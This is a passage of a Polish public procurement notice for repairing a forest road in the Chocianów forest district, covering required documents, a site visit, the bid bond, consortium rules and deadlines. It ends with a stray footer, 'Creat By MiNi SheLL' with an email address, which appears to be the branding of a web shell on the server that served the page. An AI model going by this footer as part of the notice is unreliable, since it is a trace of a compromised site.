wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP<br/>(oświadczenie o braku podstaw do wykluczenia), w zakresie podstaw wykluczenia z postępowania określonych w: art. 108<br/>ust. 1 pkt 3 ustawy Pzp; art. 108 ust. 1 pkt 4 ustawy Pzp; art. 108 ust. 1 pkt 5 ustawy Pzp; art. 108 ust. 1 pkt 6 ustawy Pzp.<br/>Oświadczenie należy złożyć zgodnie z załącznikiem nr 7 do SWZ.<br/>d) wykaz wykonywanych robót, sporządzony zgodnie z załącznikiem nr 8 do SWZ potwierdzający spełnienie przez<br/>wykonawcę warunku udziału w postępowaniu;<br/>e) dowody określające, że wskazane przez wykonawcę w załączniku nr 8 do SWZ roboty zostały wykonane należycie.<br/>Dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot na rzecz którego roboty były<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty, potwierdzające należyte wykonanie wskazanych robót;<br/>f) informację z Krajowego Rejestru Karnego w zakresie: art. 108 ust. 1 pkt 1 i 2 PZP, art. 108 ust.1 pkt 4 PZP, odnośnie do<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – wystawioną nie wcześniej niż 6 miesięcy<br/>przed jej złożeniem;<br/>g) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeżeli Wykonawca wykazując spełnienie warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji innych podmiotów. Niewiążący wzór zobowiązania do oddania<br/>wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia stanowi załącznik nr 9 do SWZ; (jeżeli<br/>dotyczy)<br/>h) oświadczenie podmiotu udostępniającego zasoby o spełnieniu warunków udziału w postępowaniu, sporządzone zgodnie<br/>z załącznikiem nr 10 do SWZ; (jeżeli dotyczy)<br/>i) oświadczenie podmiotu udostępniającego zasoby o braku podstaw do wykluczenia, sporządzone zgodnie z załącznikiem<br/>nr 11 do SWZ; (jeżeli dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Informacja dotycząca przeprowadzenia przez wykonawcę wizji lokalnej<br/>1.Zamawiający wymaga przeprowadzenia wizji lokalnej w terenie przez wykonawców ubiegających się o udzielenie ww.<br/>zamówienia publicznego. Potwierdzeniem dokonania wizji lokalnej będzie załączony do oferty protokół z przeprowadzonej<br/>wizji lokalnej (załącznik nr 13 do SWZ), potwierdzony przez przedstawiciela Zamawiającego. Ustala się termin<br/>przeprowadzenia wizji lokalnej na dzień 26.09.2023 r. na godzinę 12:00, miejsce spotkania: siedziba Nadleśnictwa<br/>Chocianów, ul. Kościuszki 23, 59-140 Chocianów. Uprasza się o terminowe przybycie zainteresowanych wykonawców.<br/>2.Zamawiający dopuszcza możliwość przeprowadzenia wizji lokalnej po terminie wskazanym w pkt. 24.1. wyłącznie po<br/>wcześniejszym telefonicznym bądź za pomocą poczty elektronicznej uzgodnieniu z Zamawiającym nowego terminu.<br/>3.Brak w złożonej ofercie protokołu z przeprowadzonej wizji lokalnej (załącznik nr 13 do SWZ) potwierdzonego przez<br/>przedstawiciela Zamawiającego, będzie skutkował nie spełnieniem przez wykonawcę warunku udziału w postępowaniu i<br/>oferta ta zostanie odrzucona przez Zamawiającego (art.226 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych (tekst jedn. Dz. U. z 2021 r. poz. 1129 z późn. zm). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga od wykonawcy wniesienia wadium w kwocie: 3 000,00 zł (słownie: trzy tysiące złotych 00/100).<br/>Wadium należy wnieść przed upływem terminu składania ofert określonym w pkt 9 SWZ i utrzymywać nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>Wadium może być wniesione w jednej lub w kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w banku PKO Bank Polski<br/>S.A., nr rachunku 23 1020 5226 0000 6702 0418 3125.<br/>Wadium wnoszone w pieniądzu musi wpłynąć na wskazanych rachunek bankowy zamawiającego najpóźniej przed upływem<br/>terminu składania ofert (decyduje data wpływu wadium na rachunek bankowy zamawiającego). W tytule przelewu należy<br/>wpisać: Wadium dla oferty pn. „Poprawa stanu technicznego nawierzchni drogi leśnej w Leśnictwie Chocianów oddz. 94”.<br/>Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>-nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib;<br/>-określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-kwotę gwarancji/poręczenia;<br/>-termin ważności gwarancji/poręczenia;<br/>-zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego w okolicznościach określonych w art. 98 ust. 6 ustawy Pzp.<br/>W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku oferty wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum): w formularzu oferty<br/>należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>1) w formularzu oferty należy wskazać firmy (nazwy) wszystkich Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia;<br/>2) oferta musi być podpisana w taki sposób, by wiązała prawnie wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi<br/>wynikać z treści pełnomocnictwa załączonego do oferty – treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania;<br/>3) oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp tj. oświadczenie o spełnieniu warunków udziału w<br/>postępowaniu (wg wzoru stanowiącego załącznik nr 4 do SWZ) oraz oświadczenie o braku podstaw do wykluczenia (wg<br/>wzoru stanowiącego załącznik nr 5 do SWZ) składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu. Oświadczenia wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, o których mowa wyżej powinny zostać złożone wraz z ofertą pod rygorem nieważności, w formie elektronicznej<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>4) dokumenty, o których mowa w pkt 16.4. lit. b), c) i f) obowiązany będzie złożyć każdy z wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>5) wszyscy Wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą ponosić odpowiedzialność solidarną za<br/>wykonanie umowy;<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wyznaczą spośród siebie Wykonawcę kierującego (lidera),<br/>upoważnionego do zaciągania zobowiązań, otrzymywania poleceń oraz instrukcji dla i w imieniu każdego, jak też dla<br/>wszystkich partnerów;<br/>7) Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez lidera lub od<br/>wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia łącznie lub każdego z osobna.<br/>2. W przypadku Wykonawców wykonujących działalność w formie spółki cywilnej postanowienia dot. oferty Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) stosuje się odpowiednio <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-10-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Elektronicznie poprzez Platformę e-Zamówienia pod adresem zamówienia wskazanym w niniejszym ogłoszeniu w Sekcji III pkt. 3.1</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-10-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca załączy do składanej oferty kosztorys ofertowy sporządzony zgodnie z przedmiarem robót kosztorysu<br/>inwestorskiego określonym w załączniku nr 1 do SWZ - Opis przedmiotu zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com